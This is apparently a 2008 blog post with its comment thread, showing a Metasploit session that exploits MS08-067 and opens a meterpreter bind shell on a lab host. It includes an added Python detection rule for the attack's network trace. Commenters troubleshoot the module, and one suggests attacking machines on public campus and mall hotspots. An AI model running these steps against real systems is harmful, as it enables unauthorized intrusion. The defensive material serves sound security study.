MS08-067
msf > version
Framework: 3.2-testing.5773
Console  : 3.2-testing.5773
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

msf exploit(ms08_067_netapi) > info windows/smb/ms08_067_netapi

       Name: Microsoft Server Service Relative Path Stack Corruption
    Version: 5803
   Platform: Windows
 Privileged: Yes
    License: Metasploit Framework License (BSD)

Provided by:
  hdm

Available targets:
  Id  Name
  --  ----
  0   Windows XP SP2 English (DEP)
  1   Windows XP SP3 English (DEP)
  2   Windows 2003 SP0 English (NO DEP)
  3   Windows 2003 SP2 English (NO DEP)

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOST                     yes       The target address
  RPORT    445              yes       Set the SMB service port
  SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload information:
  Space: 400
  Avoid: 7 characters

Description:
  This module exploits a parsing flaw in the path canonicalization
  code of NetAPI32.dll through the Server Service. This module is
  capable of bypassing DEP on some operating systems and service
  packs. The correct target must be used to prevent the Server Service
  (along with a dozen others in the same process) from crashing.
  Windows XP targets seem to handle multiple successful exploitation
  events, but 2003 targets will often crash or hang on subsequent
  attempts. This is just the first version of this module, full
  support for DEP bypass on 2003, along with other platforms, is still
  in development.

References:
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-4250
  http://www.microsoft.com/technet/security/bulletin/MS08-067.mspx

msf exploit(ms08_067_netapi) > set RHOST 192.168.132.130
RHOST => 192.168.132.130
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set TARGET 0
TARGET => 0
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Connecting to the target...
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.132.130[\BROWSER] ...
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.132.130[\BROWSER] ...
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73227 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.132.1:51707 -> 192.168.132.130:4444)
meterpreter > sysinfo
Computer: Research-1
OS : Windows XP (Build 2600, Service Pack 2).
Once again NetBIOS is the way into Microsoft Windows. Maybe it is time for tutorial writers to forget about the RPC DCOM holes as the example for breaking into Microsoft Windows via Metasploit.
I think everyone loves 2008…
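From the defender's side, the session above leaves a recognisable trace: a DCERPC bind to the Server Service interface (UUID 4b324fc8-1670-01d3-1278-5a47bf6ee188) over the \BROWSER or \SRVSVC named pipe on port 445, followed shortly by a fresh inbound connection from the same attacker host to the bind_tcp listener port (4444 here). The following is an added example, not code from the original post or from Metasploit: a small correlation rule run over constructed sensor log lines, where the key=value log format and field names are assumptions and the 10.0.0.x entries are invented decoys.

```python
import re
from collections import defaultdict

# Interface UUID and pipe names taken from the msfconsole output above.
SRVSVC_UUID = "4b324fc8-1670-01d3-1278-5a47bf6ee188"
SRVSVC_PIPES = {"browser", "srvsvc"}

# Constructed sensor lines in an assumed key=value format (not any real product's format).
# Line 1-2 mirror the post's session; the 10.0.0.x lines are decoys: a bare SRVSVC bind,
# and a bind to the LSARPC interface followed by an unrelated connection.
SAMPLE_LOG = """\
t=100 event=dcerpc_bind src=192.168.132.1 dst=192.168.132.130 dport=445 pipe=\\BROWSER uuid=4B324FC8-1670-01D3-1278-5A47BF6EE188 ver=3.0
t=101 event=tcp_connect src=192.168.132.1 dst=192.168.132.130 dport=4444
t=200 event=dcerpc_bind src=10.0.0.7 dst=10.0.0.20 dport=445 pipe=\\srvsvc uuid=4b324fc8-1670-01d3-1278-5a47bf6ee188 ver=3.0
t=300 event=dcerpc_bind src=10.0.0.9 dst=10.0.0.20 dport=445 pipe=\\lsarpc uuid=12345778-1234-abcd-ef00-0123456789ab ver=0.0
t=301 event=tcp_connect src=10.0.0.9 dst=10.0.0.20 dport=4444
"""

FIELD_RE = re.compile(r"(\w+)=(\S+)")

def parse(line):
    """Turn one key=value log line into a dict."""
    return dict(FIELD_RE.findall(line))

def is_srvsvc_bind(ev):
    """True for a bind to the Server Service interface over one of its named pipes on 445.
    UUID case and the leading backslash on the pipe name are normalised."""
    return (ev.get("event") == "dcerpc_bind"
            and ev.get("dport") == "445"
            and ev.get("uuid", "").lower() == SRVSVC_UUID
            and ev.get("pipe", "").lstrip("\\").lower() in SRVSVC_PIPES)

def correlate(log, window=60):
    """Return alerts keyed by (src, dst): 'srvsvc_bind' for a bind alone, upgraded to
    'srvsvc_bind+callback' when the same src opens a new TCP connection to a non-445
    port on the same dst within `window` seconds of the bind (bind-shell pattern)."""
    binds = defaultdict(list)
    alerts = {}
    for line in log.splitlines():
        ev = parse(line)
        t = int(ev["t"])
        key = (ev["src"], ev["dst"])
        if is_srvsvc_bind(ev):
            binds[key].append(t)
            alerts.setdefault(key, "srvsvc_bind")
        elif ev.get("event") == "tcp_connect" and ev.get("dport") != "445":
            if any(0 <= t - tb <= window for tb in binds[key]):
                alerts[key] = "srvsvc_bind+callback"
    return alerts
```

A bare SRVSVC bind is routine share-browsing traffic, so on its own it is a low-confidence signal; the follow-up connection to an unusual port on the same host is what raises confidence, and on a patched host the bind still appears but the callback never does.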
October 31st, 2008 at 12:43 pm
Wow, thanks bro. By the way, why hasn't the 3.2 framework version for Windows been released yet?
November 1st, 2008 at 6:54 am
Metasploit 3.2 is still in testing; to get that version you can update directly from its trunk via svn.
November 3rd, 2008 at 1:42 pm
AFAIK, isn't target 0 the Windows 2000 option? If so, does that mean the ret addr is possibly the same? (and I don't think so) So weird. By the way, the exploit written by EMM works. Anyway, it seems MSF development is getting more and more stalled.. hehe
November 3rd, 2008 at 3:53 pm
#3 It depends on the version; if you update from the latest svn there is already a lot more target data for various locales, contributed by the worldwide MSF community. The writeup above used an early release. The RET ADDR is of course different. Hihi, yes, since spoonm and skape are no longer core developers there will probably be changes.
msf > version
Framework: 3.2-testing.5773
Console  : 3.2-testing.5773
msf exploit(ms08_067_netapi) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows 2000 English
   1   Windows XP SP0 English (NO NX)
   2   Windows XP SP1 English (NO NX)
   3   Windows XP SP2 English (NX)
   4   Windows XP SP2 French (NX)
   5   Windows XP SP2 Italian (NX)
   6   Windows XP SP2 Portuguese (Brazil) (NX)
   7   Windows XP SP2 German (NX)
   8   Windows XP SP2 Chinese (NX)
   9   Windows XP SP3 French (NX)
   10  Windows XP SP3 English (NX)
   11  Windows XP SP3 Spanish (NX)
   12  Windows XP SP3 German (NX)
   13  Windows XP SP3 Portuguese (Brazil) (NX)
   14  Windows 2003 SP0 English (NO NX)
   15  Windows 2003 SP1 English (NO NX)
   16  Windows 2003 SP2 English (NO NX)
   17  Windows 2003 SP1 English (NX)
   18  Windows 2003 SP2 English (NX)
November 5th, 2008 at 10:02 am
Hahaha, yes, sorry I didn't see that you had already listed it in the article (hmm, I just wasn't careful enough). I haven't used MSF in a long time; I'm still conventionally stuck on single exploits (they get released faster, especially on IRC :)).
Yes, plus the license change issue; besides, it seems there really is a political issue behind the repeated delays in releasing this exploit. Microsoft seems scared.
November 6th, 2008 at 4:19 pm
Mas, I updated metasploit on Thursday, 6 Nov 2008 (command = "svn update"), but why doesn't it work…
The error looks like this:
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[-] Exploit failed: can't convert nil into Integer
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >
Yet when I updated on Wednesday, 5 Nov 2008, the exploit worked, on the same computer (my own LAN). Why is that, mas?
Or could I ask for your "ms08_067_netapi.rb" file? Please send it to my e-mail, mas…
Thank you…
November 6th, 2008 at 10:16 pm
@poniman_coy
If you want to use the 3.2-testing version on WINDOWS you have to update via svn update. The way to do it: "svn co http://metasploit.com/svn/framework3/trunk"
@franky
"Exploit failed: can't convert nil into Integer". When I contacted the owner, HD Moore, he said this does happen for certain SPs.. but, hold on.. try looking at the script in notepad.
Find the word "Sratch" and replace it with "Scratch". In my opinion that patch for revision 5846 failed. Just wait for the next patch; maybe the typo will have been fixed by then.
To all: I'm new here and need to learn a lot from you all, especially writing exploit code.
Thanks
-Corbinz-
November 7th, 2008 at 12:56 pm
#6, as CorbinZ said, there is a typo or misspelling for every target in the Scratch address part. In that update it is written as Sratch rather than Scratch; I tried updating with the same trunk as you and got the same error. Just replace Sratch with Scratch (the -i makes sed edit the file in place rather than only printing the result):
$ sed -i 's/Sratch/Scratch/g' ms08_067_netapi.rb
#7, Welcome… =)
November 7th, 2008 at 1:09 pm
Whoa, the young people of today just keep getting cooler..
**I've never even used metasploit and can't
November 8th, 2008 at 10:20 am
** Ugh, I've never been able to use Metasploit… Such is fate **
November 8th, 2008 at 2:41 pm
@corbinZ and @staff
The exploit is working again, thanks a lot mas….
@ph03n1x and @scut
Just keep trying, don't give up, and if there's an error it can be discussed here….
November 9th, 2008 at 3:15 am
#10
That's why, dumbass, don't wait for handouts! Find it yourself =))
#11
Yes sirrrrrrr, boss
November 10th, 2008 at 4:15 am
I've installed BT3F and updated its msf3. What is the next step after using "PAYLOAD windows/meterpreter/bind_tcp"? Sorry, I just want to know. I have nowhere to test it. Thanks to whoever is willing to answer.
November 10th, 2008 at 7:48 am
@QU1NT1N
Just type "help", and you'll get a list of the features available in meterpreter….
Happy trying..
November 10th, 2008 at 1:38 pm
@CorbinZ thanks bro, it works,
November 10th, 2008 at 5:30 pm
Is that so, mas franky? Alright then, I'll borrow a pirated CD first…
November 10th, 2008 at 6:45 pm
Hmm, why is it, mas, that when I ran svn co http://metasploit.com/svn/framework3/trunk it ran, and when it finished it said checked out revision 5846. Now, your suggestion above was to replace the word Sratch with Scratch. When I checked, the word sratch was no longer there, only Scratch, so it was already correct. So why, when I use windows/smb/ms08_067_netapi, does it fail? Is something still wrong? Is it because I'm using metasploit 3.0, and do I have to use 3.1?
November 11th, 2008 at 11:58 am
http://www.kecoak-elektronik.net/log/2008/10/31/ms08-067/
check this out…
November 11th, 2008 at 12:00 pm
http://video.google.com/videoplay?docid=-5555664098592837592
November 11th, 2008 at 1:12 pm
#12 I'm going to Bandung on 15 November; if you want to come along, try confirming with Opik.
November 11th, 2008 at 10:53 pm
@poniman_coy
YUP… just use 3.1, it's more up to date…
November 11th, 2008 at 11:22 pm
#20, check out the girls in Bandung for me, it's been a long time since I visited =))
November 12th, 2008 at 1:00 am
@CorbinZ I'll try it bro…
@http://video.google.com/videoplay?docid=-5555664098592837592, watching that video could make you blind… the picture is all broken up..
November 12th, 2008 at 4:54 am
Asking permission to download the video.
November 17th, 2008 at 4:53 am
I'm using Metasploit version 3.1 for Windows. It has been updated using the Online Update file, but the exploit for MS08-067 is still not there… I already have ms08_067_netapi.rb, so how do I integrate it into the Metasploit Framework???
Thanks
November 18th, 2008 at 2:47 pm
Mas, how do you configure svn when using an http proxy? I keep failing whenever I try.
November 19th, 2008 at 9:08 am
Why, after "svn co http://metasploit.com/svn/framework3/trunk", do I still get
msf > version
Framework: 3.1-release.5366
Console : 3.1-release.5404
and when I run "svn update" the output is
Skipped '.'
Please give me a solution
December 1st, 2008 at 10:33 am
Hmm, still confused hehehehe.. there's really no place to explore it..
December 5th, 2008 at 8:26 am
@f4riz
Just download version 3.2, it has been released…
@b4tn3t
As for targets, you can look in campuses and malls that provide hotspots…
Does anyone know of or have a video on defacing the desktop display??
thanks everyone…
December 10th, 2008 at 10:37 pm
@franky
Yes, I've downloaded it and it worked. Thanks everyone from the kecoak crew, I learned something new.
December 20th, 2008 at 10:56 pm
Cool, now it's just a matter of how to defend. Does anyone know? Don't let it happen that after attacking, we get attacked and lose completely :)
By the way, does anyone know how to install additional modules/exploits in metasploit?
December 30th, 2008 at 8:51 pm
^-- Just run Start -> Programs -> Metasploit 3 -> Online Update,
it will download it by itself ^_^
Wow, awesome, it can be used against XP SP2.
By the way, how can we open port 445 on the target computer so we can get this exploit in? Anyone know? plz . . .
January 8th, 2009 at 6:03 pm
#31
Defend? Just update your Windows :p
#32
Open the port? Uninstall the update :p
February 1st, 2009 at 12:42 am
Opening the port is probably hard; better to scan for port 445. But that takes a loooong time…
May 15th, 2009 at 10:23 pm
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability...
[*] Exploit completed, but no session was created.
# Why doesn't it work?? Any ideas, guys?
June 11th, 2009 at 6:31 am
Yes, same problem as #35
.....
[*] Triggering the vulnerability...
[*] Exploit completed, but no session was created.
Why is that, bro?
July 18th, 2009 at 9:05 am
Same here… it never works.
It always FAILS… phewww
July 30th, 2009 at 12:21 pm
A hot afternoon:
I tried following this but it always shows:
>> exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability...
[*] Exploit completed, but no session was created.
Thanks for the info
October 6th, 2009 at 4:40 pm
The portable version of Metasploit 3.2 can be downloaded at http://www.indowebster.com/Metasploit_Framework_32_Portable.html Please use it wisely.
I tried the same as the tutorial. The DOS prompt session doesn't appear. With the payload windows/shell_bind_tcp, the session closes immediately when I want to open the target's DOS prompt. Anyone know the cause? Here's the output:
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Triggering the vulnerability...
[*] Command shell session 2 opened (192.168.0.6:1661 -> 192.168.0.1:4545)
[*] Command shell session 2 closed.
October 24th, 2009 at 12:28 am
lol
happy playing
playing for happy
wtf